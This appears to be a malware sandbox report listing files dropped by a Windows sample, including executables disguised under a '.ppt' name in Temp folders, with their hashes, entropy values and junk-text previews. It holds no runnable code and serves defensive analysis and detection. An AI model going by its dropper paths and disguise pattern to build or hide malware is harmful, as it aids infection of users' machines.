                                      SHA-512:58F68B7BB83FF2B25EA6104ED1FF791BBD0B68BF6E2D182E15E1BFC669EDD9D6F080541F801F217D66AFD7B50C6A9C9F95B03065CD53134B33CF9CF22A9C1B53
                                      Malicious:false
                                      Preview:9mV826q9zAMGJ14708CT87fmcNOFk530L13485ib076985F2417rP0yZiQDuN8St70NX5q72U4Xsx22yf5o34t592156w553sz1J692urlXV4r9CGZ115RM8hAo1K062F2UP3..GuiDateTimePicker DateTimeConstants..C7n60w9Nf5385aOQRGQ1434H8ZAoUt93TW9w39248BN348UaaZSy00K60IQV7tQy86e3Qd220asJ6K..ColorConstants FontConstants..3ll5jR8JX7zb0R12b0AK26V6nM5Gi50Xl913owK2Ly4t3wB6D3jo0RiJ465g5TzHv9n10s4w3..DateTimeConstants DateTimeConstants..LLU4J22Sk28972J5t996809D..GuiDateTimePicker ColorConstants..2L6uMOt5O12MfDln75ejWq27d9x3478ZJ5PcMu3z4198L5EJ57jaWaGYM004MW6bHO2Y5q70Y19V81gsJzmG4H387611..TreeViewConstants BorderConstants..
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (420), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):89890
                                      Entropy (8bit):3.0340576559820898
                                      Encrypted:false
                                      SSDEEP:192:IkkkkkkkkkkkkLhkkkkkkkkkkkkWkkkkkkkkkkkkskkkkkkkkkkkkRxkkkkkkkkz:QdB
                                      MD5:9CC31F5D12CE4609EC12D092A028BB23
                                      SHA1:AE3C36DA54C2142A6DC0D2987AD518ACC850F803
                                      SHA-256:1FC30FCF18A2B46D9F3256F069598E0D622615FFC39CF57558BE2B398F59E31E
                                      SHA-512:6E921A8972D1689D48625A4DC9AF744382D0880D7768D6906580E87355CEF39C789CB746DEB93F2E457F2A8CF3A3E6159E001400317051BA8397AA4D635379F8
                                      Malicious:true
                                      Preview:..T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.....T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.....T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):34649
                                      Entropy (8bit):5.586154777776895
                                      Encrypted:false
                                      SSDEEP:768:lXC7WQmlFk5gviQr5HlfdIxNMan26hpqsQwlTZvqZEbb2B8n:lXC7wjia5HZduNN2McsQsSZj4
                                      MD5:55BC888147FD7CC3A422713F543596C8
                                      SHA1:748970FBC9A4F80714E0D4FD12D6209F60F2EC97
                                      SHA-256:FF7FC54EADE5736B5805B37BF827E5855A2F71E8D624665539368521A786A8D7
                                      SHA-512:66490BF66436F33B3FF20232E7A095C97F23CFC19C5E9FECBA436853F26ED7055CC3B9219F55B0329B5E656DE601A03FA9ECD9F2298FF44D2310BEAF5966F972
                                      Malicious:false
                                      Preview:k11085i47B098ipIZ397O713A9153F9TV9447A8O8H5my1y..BA7152R96q91a7Ny7hNqIB4d427iaCLIFQ5393u02rS8q72ANHu7v88k..88rO6w538B8928El4Gi1944cV8413542037a..gqPB82C4O682aa3175028f3I037dIV0G490O7g1nP6e4J0Ui79lOi..5zy39Xh71e2Yg5mUo4352696z62Z328xh572U0Iu7WN70G2Z35324Y6f8uys0CzMe7HbY5mETD8X5LqvEA7..u663LUeLk9pED0zkG579EK87H3k17LC8Uobwq892l6qU320039RM3a7Q630Cb2xoIj345w57i..C9ECu9v8729iLky2rf5eV9K8951598I2Mm0aG615HMO1041UV4c9971pVWd..Edd51cjqXrpUu5st46092f8n897YkhNHs610O171Iz590126NX1817wq95sh8CC57l62l3J7..0P6V19I106F862nX264qFA1Nu6h65mcl27471t664yPvL3QUg735OwV3EeX0a5K38Oe7ioC2834W69E3f8Zs09..1795L781Y4qRAKg847Hm8SDCZ1eu4W2ZF9ys83V04U..3gLjtM8TQ6p781y8zn69480UCd246020l6..wP71598C1900839D27X56Sps..1z9DJ7TbTs06r3Q6nbksStmb6Sfi42iF3PTC5r6L233gan..0E2g1B3Z22Ny6U01x804stYL74sc9oj..821csA8952KiM2B3G0E7E594b2Rqsk6xtl2Tis54sEJ3NWXZ4G24Rr3..ke3LB5QUZj4Qi5gDr4w79Cu..68J0w7300016B71m2O4R4Gn788pBV7N2VDNlY4P8b..q8f49e87377v52HW335d29k12gJ7e6908FO33EbBE2eAn00sK9x0T095..p4i8N7f44723O74z5ie66333f1dY4h0122H9k785o489C7i
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):578
                                      Entropy (8bit):5.55462349735179
                                      Encrypted:false
                                      SSDEEP:12:HgjxwyARG+OQkzPJxvqmsmguTt2FnPqfp/cMcuSf5aMwE8Rc:Hma6PJxvoJuT4FSx/cX5UEec
                                      MD5:BD024A03BEDCF16316AB8A1EC87ADAA6
                                      SHA1:0D7003B89301CCF8CDB326C3FCD98E96A60F1663
                                      SHA-256:1BCF4BA6AD5075F633662C184DE0E46B4E5764B70FFCF8840C48BE4679398560
                                      SHA-512:28294B36BA4AB7290010EA826952A4F82A06123987C84B3A91DB90B5AE7B6E538A407933A750AA4619F7D93449A721B648ECB7F256758ABB9FBFAC92C6ACF066
                                      Malicious:false
                                      Preview:92IMS0831753n1742846xcKi98352P20l3g47O5ZDW399nZ3m29Uxc8776oR4lYzAm009q..ColorConstants ComboConstants..79244Qv97071u88o1237p2J8493G0908Sd5J5o4779pOhuH7U4XnE1p0F17F897gWg05j2g4pQ..BorderConstants ColorConstants..KfWc404R3PM8N81xlyh1WRs100d477r11Bes0ln48M3pmr6eJ7803c141R70I3DaQ0s4Y9..ToolbarConstants ComboConstants..yd145r1VGKW045ArLepx6932WX1Q5Lqo356601609scn0RX0ccNGc41UZOrg9x089TImZ..TreeViewConstants GuiDateTimePicker..m4779it98iBSS2H41B3DZqR04pp0S3zpWI5A0Bh3C2Y93f5H07muh7E663vdnbI2J3m518HU118fT1YW656yg7WV1ksd16F64n363W35493a15nD783FNq..FontConstants StructureConstants..
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):506
                                      Entropy (8bit):5.616383312872459
                                      Encrypted:false
                                      SSDEEP:12:wCixLARfyJKz++SGUVxSKvKuE8R0RcdbgXsyy/UJ:wB+VsKSrVEKSuEeic2X6/UJ
                                      MD5:E167B220B80135A631F589043CA899B5
                                      SHA1:0E0850082F18334CD783DD174345934AED7221C5
                                      SHA-256:819EA1F99B61B3DC631F935EB6C5876034F373EB1EC4FEC2DB8873523696C518
                                      SHA-512:CC5FE2989BA6C3BCE2310C28D0398500436E65DB6B8EEA08387C99E5871E2AACBAE908A4B1C89B57EF1847A40FFEE82A1777B4577EB01E7235176566CA965C86
                                      Malicious:false
                                      Preview:4v826462174I5lWO87q6wXTVA0E49B3QnrKH2N7g11zT0u29S8ePHlTi7zW34Z43sD4wzvDa1oi4UO350og4m5816Ns54m8Fqzf8P6s16c8bTtx48d5X7W66N2VJ0u392M55eI16MDUL5I45d120LX38ru..ToolTipConstants BorderConstants..PZA2O6qX86c988XJ1519vG92kE5ig9iu6cN63Y819775T13S6kMC05aTUo4rD7W7360W1Xo2LI86c64gGp2F5s021Z4FAJm6vL0oBj9i19nSS974za8420R9QH0k2le..FontConstants StructureConstants..1d50bx51ta0851Ip0QK9C24Fk6i74462M4rxe147T2K78M68yRRW0ROzqxqgQ4q8Zt3e2fDmLMxK53K0sJ4hVF1Qkgp5R8W66e5X450B5T33k12p62eCO..StructureConstants FontConstants..
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):519
                                      Entropy (8bit):5.630465665150215
                                      Encrypted:false
                                      SSDEEP:12:jWMubVd2pSlVcmR9Sz2nf9+xTkRJx72COem0uc:VlSjFRNdbIZem0uc
                                      MD5:70C69AA9F7B1E888CA0714E89BE32098
                                      SHA1:4F4BB1D33E921CF93182936499BFDF16A96F7F97
                                      SHA-256:7ADB1E9738343F7EBE30EF6B7F6650FFFEE059EC22D98EBF17DC135E2C835B2F
                                      SHA-512:A01EB39E1FBC1A647D316264260B8C1748F1C49509342B04547B94BD09FDA4B26FA04AA6D10C799A1426AE69746A6A2383E6963CEBACF3E66194E295C13E686E
                                      Malicious:false
                                      Preview:o34Jj1t91U565ClVMKU1I5n2xfyn87qi2UB9zlU0X1mIwt0c0L6Q7e2J04875mn0620d2J269QAZp6eb9H2..DateTimeConstants GuiDateTimePicker..77654f..GuiDateTimePicker GuiDateTimePicker..T3041v39DD4mkVxX2Y8566G1v1h653q5N9G1gU0ETYJEfK8Z3h3088i9gO97o07594O4fX7vmV2KAcPQ0v8LI27vfQIcc8L62WkOLb26939dcVH5o2WP69O1L8D895mqg2V4h4O67fN810W0kegQUq255cEoB0kzM0Z5C3O23zOdd18..GuiDateTimePicker ComboConstants..33Hmaj5J68xO0L35m081004Ei5T5903S9Ja9u09252705gc6unJ89h8rYx67aJK1369AmGu0zw8bK2354g79n34t7m36XyN7dZ4c0..GuiDateTimePicker StructureConstants..
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):551
                                      Entropy (8bit):5.464724766594262
                                      Encrypted:false
                                      SSDEEP:12:u/nl+yfdZlvaE2S0GjIAVSmf9lQLITUu7rBPuq1qy2Xva/XR:fyFbx2JyS69OLIhrrgP/SR
                                      MD5:F6DE4EFF7A4743ECFB4FE11E27DDE3B4
                                      SHA1:B451BE4E2C5A0873AD0A69D4855D75CB065A06BE
                                      SHA-256:2F77B1B7FE13AA79B41995F99BE0EF1B85B492C30B594DEAF0239257C72A5BFE
                                      SHA-512:0D0470CE4514A6A6951847AC61F5D09AB99E4B064FE4AD8E21A4F8AFED68D56BD996EDA5392AE6E8BE5C4824B884E85D76A4511872386873557D4730C5ABBE9C
                                      Malicious:false
                                      Preview:DF3853Cv6G2uAvl9O8a03egwF4zKBMW8DT8F..UpDownConstants BorderConstants..ngD9b3GQ8VOF526bx..ToolbarConstants DateTimeConstants..0ZB2P1YA03zsxrOH71yMgRL56389398XddRO963kkRSN..FontConstants BorderConstants..7JO3CW7xBwJ5y4K43DNh6KCj9OT1jd1Ew8tp6201r2nCb..ButtonConstants ComboConstants..c985j8iDQC971U5Y3T773tV5518dH48VL29WUQm0A026K285qx161tcw0Es15vs5JgQJm3u43gvB..StructureConstants TreeViewConstants..4j1k4nK3ObA65TO265579892TH94a2C7Y7l6B76q5s7Qz50b06766dCMI9N16..ToolTipConstants ComboConstants..K3os83FI0IhD875J2nu..DateTimeConstants ToolbarConstants..
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):639
                                      Entropy (8bit):5.602648525665025
                                      Encrypted:false
                                      SSDEEP:12:EuAcO3XlFyzyVP21+KTizbQQ21BP42OHLLWHwl3MxKoH9Rd9qqPlWSOC7uWk:EUOHlWy4YKOz0Q21JoASu3dxP+6Zk
                                      MD5:D0C528931B9B927B80B3FF7191E579EB
                                      SHA1:2060A0C27AB1C778D6B70828C2DFF9D1059E1A70
                                      SHA-256:466DB50BDC62D3C43698CF27D34FF2589782A4C81776DD3D79AAC808208FB512
                                      SHA-512:D508F51FA8CBD713BF9CC426D175193C1D78B670D193A9C1037B4B8C3E89E76F1CE712C74A2917CE81A8B8BBC5A28F1118DB1938BB9880EBCE5241813D0E55CD
                                      Malicious:false
                                      Preview:l4eS1vLhg329by80Cr512210213opL99SyvX9jY9b82566q02W5a3G61O9845Y43549g8KvCLM2hIcF4OU0qb1dq82F4Tm566258E98082l..TreeViewConstants ToolbarConstants..QclN133d1Xdi55O1Dv59y2qL9x4d6eh5woj68u0AHV134C4cpP18p6m2Xq8H65597J52l4hImFd878nw81..FontConstants TreeViewConstants..Gleu275qKt3xw..BorderConstants DateTimeConstants..LD3Y034412Cyv93x9Y96Mi75899PWb43bphphSr9qclQ3u70o55884u79f8e8XBBpi358P8cUj024rnOb..StructureConstants StructureConstants..Dk6W083Uohe2V6aL2P7bX204YIg3Au21W113f2r965098PZ01d2H53c99qhz22287719T5Q715E32a7S34PD789Dr0M5748h01xM75i8pwQv34G84Lo8kd4aEJt7amEFD4QZsO4RH768p825AF6q7iOg22f06pTCgNiVX37zn..ToolTipConstants UpDownConstants..
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):568
                                      Entropy (8bit):5.5561410123959805
                                      Encrypted:false
                                      SSDEEP:12:V8/EbUgzwRzDaaoTdvq8ZcYij13oADRywploryNBc5Qa3IPqUGvxTPrBPc:rwiKartqacYijCAtyAlormI3IyUGvtO
                                      MD5:F1A870694962DA77AF70D0D8180AF415
                                      SHA1:3686ECC61CF21D56C70C7F71160CC0ABC5D438D3
                                      SHA-256:2E3AC55B4C9E18CC1B11F739089EB6A0382AB64DF61D7FFB60B6E21B1A3B2852
                                      SHA-512:74CE196CDBDC9F308DBA90E8146768FDC7AEBEF286B028F741BED0903C3A68FEB820C1FB46B021F804DEFAE8647C1AC0309EAC3AEE320B22EC3011FAD9F3B6AB
                                      Malicious:false
                                      Preview:7doUr0WOs6Q7hdA355013Q1YC3lIKjAF37D5m1195tL7fa4pg2IQ69iFuA0Ja1yd14ThC9jVz248Cv825do0ZO88u160Aoku7j10Ek23uJ739X130M871fH5T8TT28e72Iwvn8XA6Ta7879OqL..ToolTipConstants BorderConstants..89h5V3250i86Bx8221dhTaME99T77P77pz1TA596j858i4yR6xi11xCk8as220531O3o2874fhj7T..ButtonConstants StructureConstants..D778Tr9Cs5pA16175pum81cnj7AT0E8313py59iipwQ1..ButtonConstants GuiDateTimePicker..VMW60ld653KZ3g103o028764Jt3c7CD..UpDownConstants ComboConstants..bxgd91A8C9SReE238cjAgwE7EZhm448IM7241g308u304j4h91la94oNV997MB6fmFdAh42f6Cvd21XUy1PjJ1..TreeViewConstants TreeViewConstants..
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):114364086
                                      Entropy (8bit):7.089953620024949
                                      Encrypted:false
                                      SSDEEP:12288:lqYTpLqYTpCqYTpGqYTpMqYTp4qYTpGqYTprqYTpOqYTp9qYTpjqYTpuqYTp+qY0:s1
                                      MD5:3F2E528480F94C8DB48BE4427CB904FC
                                      SHA1:2E8C1007444E32B481B87AD89FE0DF37A0BD1BE8
                                      SHA-256:9066F65824D720DFE4B8EEDB19C196B10846A84CA78B7637C0D6632409B3C53E
                                      SHA-512:A40F02857F1BBCF4B764476708D4B5A10A7F0968D0EB9BE301D0881D77187207715B987587140ACBA4D38B062C5FF96836D21A8EAC2A9A540F8E13448A337964
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:modified
                                      Size (bytes):45984
                                      Entropy (8bit):6.16795797263964
                                      Encrypted:false
                                      SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                      MD5:9D352BC46709F0CB5EC974633A0C3C94
                                      SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                      SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                      SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):537
                                      Entropy (8bit):5.605243272883823
                                      Encrypted:false
                                      SSDEEP:12:FjfgTkvCgqvvhYuZaSsOGKrCTMYWHKGg5erBP1j9RviwdxQAFPL:FjmkvCgqxYuZkYCIYU0erplDdxH
                                      MD5:F982A60E5F1B14C79FC141B895CC766C
                                      SHA1:2ECC98EA11167D0692D64FEB812E1E648503EA4A
                                      SHA-256:E019E67A0F7EC0696FEBB0DC7C6BCC727AAE6079AC6AD3FA23E7BF8A099214AA
                                      SHA-512:9E1CD62BA25C58E71D7639451C61EE9552EABA25E1E2E969ECC1E3C21DF1D339B939B2E1952142D2EB1A2969D494272FC8C391F01F9438B770CD227ADC4FFE96
                                      Malicious:false
                                      Preview:Sia21q25..ToolbarConstants BorderConstants..98xRq36y95DaGzM1R0H259..UpDownConstants FontConstants..rA024c9ph4V27w6hVjcX7912W9CkI92S37nZveKVW85fRN3A20Oaz79WTa46478128ThL65z8d6VuQnQ7y4I131B7768UWwm15Z6CwIk8174Hl54V9oG2a1K23V3v1N50t4FRC1301Jmg1g0d1695ZL29uL6gxbsV89TIR6181SZOD..BorderConstants ToolTipConstants..pb035oc34YhgKP947PsExG664m5t27X225wN0140es87e54rsE884Wvz5zj3OjVan67gUx6..StructureConstants TreeViewConstants..4Uz182p4p9QT986y4V7B8vZ1ixymR57JOv0m0c7QJuwORt79oC7T2F65NGv3qbbDLOLpl4sx8NT5438v..TreeViewConstants ButtonConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):544
                                      Entropy (8bit):5.632129400085251
                                      Encrypted:false
                                      SSDEEP:12:ZtFHc2i5d6R9c9Kn9NhSnrFWNVRF8MNQZPsEXEF4+f9CVxfh:ZtF82i5d6/Zn9N8ned6W+LuCzh
                                      MD5:6067AC7E038C2BFDFB972A778A59B502
                                      SHA1:6E271F05DBC646815F80E066278533E679D7E623
                                      SHA-256:6059FF208EB32CA458348D8090BB816F44DF314A45FA150505EAA1CDE10C64C9
                                      SHA-512:C38F9045FB97784546E8C0530C265DB7090C0C48F68A38707294258C15C9D08567B08255D16AA715215F6A4B1F90F4F2932BB022F50E74CD9371213CCCE1ECCB
                                      Malicious:false
                                      Preview:1w550f88yNMY305CLkv3T0cKo6ME19fL231JW3dZ81tG54a2eIsJ28X6p91Pcq85Sgbz1t507afppX0Bi6nR190GN0w7R6x8..BorderConstants GuiDateTimePicker..L37x74094AirySff72Zd7I4y9vOz2Rq71a0mr34w0rFabvn70OUg358TF52hO779xOZAmPBx247C03S4N2HW1blLF49R97WNn4s939P85B23cvK7C13Y86mYI6RX..FileConstants ColorConstants..d4sM7n5Wm599751RQCeVdt44P18md7iKRd3737uY4N18r8B540IH29e0T1A206DO0c1s65X9XOF625uZ6e7G0..TreeViewConstants ComboConstants..r3RX34B6512JJD3b1pp6z6218Y1U2uJ717uQ4cpf8834J6SRf0kr742c98y8019q163u32Cy9590H73Y6Ai9H8t7tJ59QV38e5..StructureConstants FileConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):535
                                      Entropy (8bit):5.538141917200933
                                      Encrypted:false
                                      SSDEEP:12:KTqHYhQZu5KfFu/YCMuZH5OvJ/QZ35sxtbw343gn6FUJ:KlhcuUYlZH5Oi5sDbTY6FUJ
                                      MD5:AF67F6BBD092665560CCA8A81115F98E
                                      SHA1:3E182E87A2FEC52365F75827FB97E3EFADEAE0EC
                                      SHA-256:B18EE92E84E90F07567CEF8A354D820D3A8F973AFDD973D8630804C6F731E991
                                      SHA-512:0A0CE38A8F7E2944C460B4A16B2221A85E1E55ECD86DBFD97B4C60505AAEB2D1EC2AE9C2C50574C082FE742368EE9BDDB554AD57E7B2BB28542B78AB04FD7799
                                      Malicious:false
                                      Preview:h43683999py64w59T1q50g8bTT99SmaofkilIl3119A26bC6f74Fk9Bb57Y..DateTimeConstants FontConstants..v7U40Q840QVa49Sh949doUJ1OtMG3AH945..UpDownConstants ButtonConstants..a2mp8V8ZvL006kg691UN32228x5A09Td4gO9CZ50HGO39dBQ6il6v270B616dRrL3..FontConstants FontConstants..1iqYH3D66Awhy4e144T4CWo99d04i07f0K58d8T051rJ0L06hsg0P656P4oh7G67vU8rV030Hn2pEkpM3803oW913s42YkiiOmiCy927K300ZUx5Gm9pAD4..FileConstants BorderConstants..nRg1yLi84rup919Pxj1374h55046PqM3U789N37WR6472X57xF860y40h27p9SY4Z6Dz32902MMJu035Pypl7ge5..StructureConstants FontConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):571
                                      Entropy (8bit):5.6091271054185805
                                      Encrypted:false
                                      SSDEEP:12:XnXxxTH2ozv4MK24RoXdPqG3x0vh4wjCPrBPeVWEkpd6XaTt1pk5C:XnhxCSgzuXQA0Z1WM0Ek/8aTbOQ
                                      MD5:C2C7D019161BB6D62F73528BFE2ED7B5
                                      SHA1:6F109FE18E7D094D1145F5B177C65F187F0AA1C0
                                      SHA-256:B2E334371BB7984DC84BC1A4D009993653DBDAB8141A7736F030496B0CCB6EED
                                      SHA-512:15FE3667791D933C49B8605140ABD61CC258DA2DA1E97799A8BC7583702881DA4E0E629325A74B0CC22F2A5EFB49333892BFE8470206788B73A762F710356023
                                      Malicious:false
                                      Preview:y13lN32ktH3BbZm934rumK09SON4MbK9R01zfM4h3qzL750..FileConstants ToolTipConstants..ku57Uq83B68K23nQ10o9S447x2226l7z00Ut3E7A3694OVo3fWM6gzDiz49fPguzlT343gb3e1b6yHTV7QbsdG640s701H44WLLK64s9Q2R9c..TreeViewConstants GuiDateTimePicker..X9xj3p3975914b74w4m6sP7Y29C6x8H5BdQY6ap318Ds35m16631I3E7cde4p000zo2l6290fH085J64452bjt82R9IL1370B4uw7fhWxzdVrXDsNa44..TreeViewConstants TreeViewConstants..3G58078Y36423eZ78780Dec144115WeXw85za91E874pw457g5reAE918AGW81Ok80w4Su2Hr9T6W4331z3uv0nhC7T2bUMYS02nW91I89t44aSQ8zVZ7473X6Z3L2J14e0O84831230On4298v06v1..GuiDateTimePicker ComboConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):947288
                                      Entropy (8bit):6.629681466265794
                                      Encrypted:false
                                      SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                      MD5:0ADB9B817F1DF7807576C2D7068DD931
                                      SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                      SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                      SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):947288
                                      Entropy (8bit):6.629681466265794
                                      Encrypted:false
                                      SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                      MD5:0ADB9B817F1DF7807576C2D7068DD931
                                      SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                      SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                      SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Process:C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):947288
                                      Entropy (8bit):6.629681466265794
                                      Encrypted:false
                                      SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                      MD5:0ADB9B817F1DF7807576C2D7068DD931
                                      SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                      SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                      SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):523
                                      Entropy (8bit):5.521120762513594
                                      Encrypted:false
                                      SSDEEP:12:rOQV8xmNmsclm90BPy4a1ZhfUm/u9DUpKQTayFlknE:rOQVHdcl2004a1fQ9DUpraynX
                                      MD5:7E36B7880B3ECD2297E6F62D55F7A65B
                                      SHA1:3815C7699D416A3277AAFE3B6A2169C777C85F17
                                      SHA-256:5669ADC7007BFF0DC135B86E4C5C10294B6F1E4505F9F3F77F5A363A67E7713B
                                      SHA-512:0F4F4278B3E263B24398297D3C669F61A41A5B794EA3497ECAAB6D315BB2ACBC9E7EC0ABECADCF3EE834D7F5D415644034AF966921CEB28208F0C9DF5AE3BFF6
                                      Malicious:false
                                      Preview:3z4Ky9aqyGldod1960R77Q97a2j8D4c1K49k8bID6s5E984I1cLDY36MP8CvdzC4161144cc78609g3Q4L7hoN9g14..ToolTipConstants TreeViewConstants..yA2A0Ocuys5O437u777rQ5b7g8b26S6Z227m0hU3O89DU2I3y50ae819dU32C0r87J05g..UpDownConstants DateTimeConstants..ys19cNG35G961QC8850179QN03543O6487hd0m21opQ14D4kqX2..UpDownConstants FileConstants..82ih944x66S9J81704t2zz18Ddk..GuiDateTimePicker StructureConstants..u8IcOFNz67RlGI..ColorConstants GuiDateTimePicker..4Ya2Mhu06PUzXbN1461xDBg7446vPs9gI672671ssb4Ly382j9yP..UpDownConstants ToolTipConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):582
                                      Entropy (8bit):5.5429803774932855
                                      Encrypted:false
                                      SSDEEP:12:OjEgmHHPndBDBDTq8kHylC9RF4G8WemdadQjdjQ3KKfxQew:0EV/dBVDToHylC36IeKWQjdXaxTw
                                      MD5:C7812BBCCB4AB3DB46B91D7DCF04CD2C
                                      SHA1:C72A668DE5788F0F0F9392CCB85A340377CEA2E2
                                      SHA-256:FE7B196CD1D3BD99D083F252DB110D1951AA69F727C305E2B248707E69AC9D55
                                      SHA-512:9CC3C1E4D0DD28B11AE1B35915750D03E00154A83270EE02BD00A0B885FC1E78D97FD38572E910CCA0B7B2D7DBE04B1BF7912401511D8A23E270B49C52D85CBF
                                      Malicious:false
